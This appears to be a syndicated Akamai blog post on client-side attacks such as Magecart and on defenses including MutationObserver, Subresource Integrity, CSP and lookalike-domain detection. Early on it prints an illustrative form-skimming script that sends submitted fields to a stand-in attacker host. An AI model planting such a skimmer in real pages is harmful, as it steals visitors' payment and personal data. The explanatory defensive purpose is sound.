Have you ever browsed a website with complete confidence that your data is protected? We tend to trust websites with some of our most valuable assets, such as personal information or credit card data. While owners of these websites might consider the protection of our data a top priority, we still keep hearing about information leaks and data breaches. Situations like this are why more and more website owners come to us for client side solutions.
In this blog post, we will explore a couple of client side threats, how they can affect website owners, as well as ways to mitigate them.
What are client side threats?
While the term “client side” has different meanings, in this post we use it to mean the web browser.
Most client side attacks are the final stage of a more sophisticated attack chain that eventually affects the website's visitors.
Recent client side attacks, like Magecart, targeted some of the biggest websites on the Internet, such as British Airways, NewEgg, and Ticketmaster. Each attack had a single endgame: your personal financial and identifying information.
Those attacks are considered client side threats because, while the main entry point might be the webserver, your data is the attacker’s ultimate goal. While such attacks keep happening, they can be quickly mitigated by understanding the client side realm. Let’s take a closer look at a few of the most common attack scenarios we have observed at Akamai.
Common Attack Scenarios
Every client side attack is different, but they all rely on the attacker gaining some sort of access to the website visitor's browser. To do that, some attackers rely on hacking the server and changing front end code, while others infect third parties (i.e., supply chain attacks).
In our first scenario, let's consider a server application (e.g., example.com) that has been compromised. We'll skip over the details of how the application was compromised, and start once the attacker has a foothold on the server. From there, the attacker can inject malicious code as first party content into the web page, in the form of inline scripts or references to other remote or local resources.
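For illustration, a hypothetical injected skimmer might look like the sketch below. The collection domain, helper function, and event wiring are all made up for this example; real skimmers are typically obfuscated.

```javascript
// Hypothetical injected skimmer, for illustration only.
// The collection domain "evil-collect.example" is made up.

// Pure helper: turn captured form fields into a query string.
function serializeFields(fields) {
  return fields
    .map(({ name, value }) => `${encodeURIComponent(name)}=${encodeURIComponent(value)}`)
    .join('&');
}

// Browser-only wiring: hook form submission and beacon the data out
// via an image request -- a classic exfiltration trick.
if (typeof document !== 'undefined') {
  document.addEventListener('submit', (event) => {
    const fields = Array.from(event.target.elements)
      .filter((el) => el.name)
      .map((el) => ({ name: el.name, value: el.value }));
    new Image().src = 'https://evil-collect.example/c?' + serializeFields(fields);
  });
}
```

Note that the image request never renders anything visible; it exists purely to smuggle the serialized form data out in its URL.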
Infected Third Party
The second scenario deals with the same web page as before, only now the server hasn't been compromised. The problem here is that the website depends on a third-party resource (like jQuery or Bootstrap). This sort of dependency creates a one-way trust, where the website blindly trusts the third party's content.
If the third-party server is breached, an attacker can replace the allegedly legitimate code with malicious code, thereby exposing the original web page's visitors to it.
The final scenario deals with the situation where neither the website nor its third-party dependencies are hacked, but the browser itself is. Browser extensions can be very useful: they can manage our passwords and personal information, block advertisements, and more. However, browser extensions come with risk, and there have been cases where official extension repositories contained malicious code.
This scenario deals with rogue browser extensions that live in our browser.
What all these attacks have in common is that the injected code, which now runs in the victim's browser, has to exfiltrate data (sensitive information such as credit card numbers and CVVs) to the attacker's servers in order to benefit from the attack. The attacker gains little from simply living in your browser. But how can we detect and mitigate these attacks?
Detection & Mitigation Methods
Over time, web browsers have become more capable and robust. For example, performing asynchronous tasks in the browser was considered a dream in the early days of the Internet. Now it is possible to harness some of these modern APIs to help protect the client from such threats.
Observing Website Mutations
One approach to protecting visitors is to use the MutationObserver API. This modern web API gives us the ability to watch for changes being made to the web page. The website owner can create a list of allowed mutations that the website already performs, so that every disallowed mutation is blocked. Blocked mutations might include adding a script tag or an image (a common exfiltration technique). An implementation of this idea already exists in a project called `DOMtegrity`.
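A minimal sketch of the idea follows. The allowlist shape, the origins, and the policy predicate are assumptions for illustration, not DOMtegrity's actual API:

```javascript
// Sketch: block DOM mutations that add scripts or images from
// origins we haven't explicitly allowed. The policy below is a
// made-up example, not a production-grade allowlist.

// Pure policy check: is this newly added node allowed?
function isAllowedNode(tagName, src, allowedOrigins) {
  // Only police the risky tags in this sketch.
  if (tagName !== 'SCRIPT' && tagName !== 'IMG') return true;
  // Inline scripts or empty sources: reject outright.
  if (!src) return false;
  return allowedOrigins.some((origin) => src.startsWith(origin));
}

// Browser-only wiring (guarded so the sketch also loads under Node).
if (typeof MutationObserver !== 'undefined') {
  const allowedOrigins = ['https://www.example.com/', 'https://cdn.example.com/'];
  const observer = new MutationObserver((mutations) => {
    for (const mutation of mutations) {
      for (const node of mutation.addedNodes) {
        if (node.tagName && !isAllowedNode(node.tagName, node.src, allowedOrigins)) {
          node.remove(); // drop the disallowed script/img
          console.warn('Blocked disallowed node:', node.tagName, node.src);
        }
      }
    }
  });
  observer.observe(document.documentElement, { childList: true, subtree: true });
}
```

One caveat worth noting: MutationObserver callbacks fire asynchronously, so an injected script may begin executing before it is removed; projects like DOMtegrity combine this with other defenses rather than relying on removal alone.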
Another instrument is Subresource Integrity (SRI). This feature enables browsers to verify that the resources they fetch (whether first party or third party) are delivered without unexpected manipulation. It works by providing a cryptographic hash of the resource, which we can calculate a priori. When the client renders the page, and before executing a fetched resource, the browser validates its content by comparing the provided hash with the one it computes.
One major web feature that has been gaining traction over the years is Content Security Policy (CSP). With CSP, a website owner can allow or disallow certain resource types from being fetched from different origins. The policy itself is transmitted to the client via a special header called “Content-Security-Policy”.
CSP works by defining a list of source types, like images, connections, and frames (also called directives), along with the origins from which each resource type may be loaded. With these directives well defined, we can control where our website is allowed to load resources from. CSP can also be used to block exfiltration requests made by the attacker's code in the browser.
In a recent Magecart campaign targeting Forbes magazine, the attackers took an unusual approach to exfiltrating the data: instead of the common methods, they used WebSockets. CSP could block that WebSocket connection using the “connect-src” directive.
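As an illustration, a policy along these lines (the origins are placeholders) restricts where scripts and images may load from, and confines XHR, fetch, and WebSocket connections to known hosts:

```
Content-Security-Policy: default-src 'self'; script-src 'self' https://cdn.example.com; img-src 'self'; connect-src 'self' https://api.example.com
```

Under this policy, a skimmer's WebSocket connection to an attacker-controlled host is refused by the browser, because that host does not appear in `connect-src`.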
Domain Name Inspection
While the following method is not a web API, I thought it would be interesting to mention. The attacker has to decide where to send the exfiltrated data from the victim's browser. They can either send it to an IP address, which looks extremely suspicious, or use a domain name.
There are a couple of methods for deciding whether a domain name looks suspicious. First, we can rely on domain blacklist feeds, which mainly include domains involved in malicious activity. Second, we can look for domains that resemble the website's own domain name.
A good example of this was the attack on NewEgg: the exfiltration domain was “neweggstats[.]com”, which, as you can easily observe, resembles the website's own domain, “newegg.com”.
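That resemblance can be scored automatically. The sketch below uses plain Levenshtein edit distance with an illustrative threshold; real detection pipelines use richer features:

```javascript
// Sketch: flag exfiltration domains that look similar to our own.
// Levenshtein edit distance with an illustrative threshold.

function levenshtein(a, b) {
  // dp[i][j] = edit distance between a[0..i) and b[0..j).
  const dp = Array.from({ length: a.length + 1 }, (_, i) => [i, ...Array(b.length).fill(0)]);
  for (let j = 1; j <= b.length; j++) dp[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      dp[i][j] = Math.min(
        dp[i - 1][j] + 1,      // deletion
        dp[i][j - 1] + 1,      // insertion
        dp[i - 1][j - 1] + cost // substitution
      );
    }
  }
  return dp[a.length][b.length];
}

// A domain is "suspiciously similar" if it is close to, but not equal to, ours.
function looksSimilar(candidate, ourDomain, maxDistance = 6) {
  if (candidate === ourDomain) return false;
  return levenshtein(candidate, ourDomain) <= maxDistance;
}

console.log(looksSimilar('neweggstats.com', 'newegg.com')); // distance 5 -> true
```

In the NewEgg case the two domains differ only by the inserted substring “stats”, an edit distance of five, so even this naive check would have flagged the exfiltration host.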
Client side threats are on the rise, as we keep seeing large websites, or their dependencies, getting compromised. While these threats usually target the website's visitors, it is evident that website owners get indirectly hurt as well.
Even if the website itself wasn't hacked, its visitors will eventually be impacted, and such situations can lead to financial or reputational harm to the website owner. By implementing at least some of the methods above, it is possible to detect and mitigate these attacks before they critically impact your business.
*** This is a Security Bloggers Network syndicated blog from The Akamai Blog authored by Daniel Abeles. Read the original post at: http://feedproxy.google.com/~r/TheAkamaiBlog/~3/OajfdiY8RyI/client-side-threats-how-could-website-owners-mitigate-them.html